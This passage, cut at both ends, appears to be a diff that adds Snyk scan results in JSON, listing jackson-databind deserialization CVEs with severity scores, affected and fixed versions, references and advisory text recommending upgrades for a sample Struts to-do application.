"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:40.405517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:42.075545Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.574354Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using the `oadd.org.apache.xalan.lib.sql.JNDIConnectionPool` (`apache/drill`) class gadget if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) 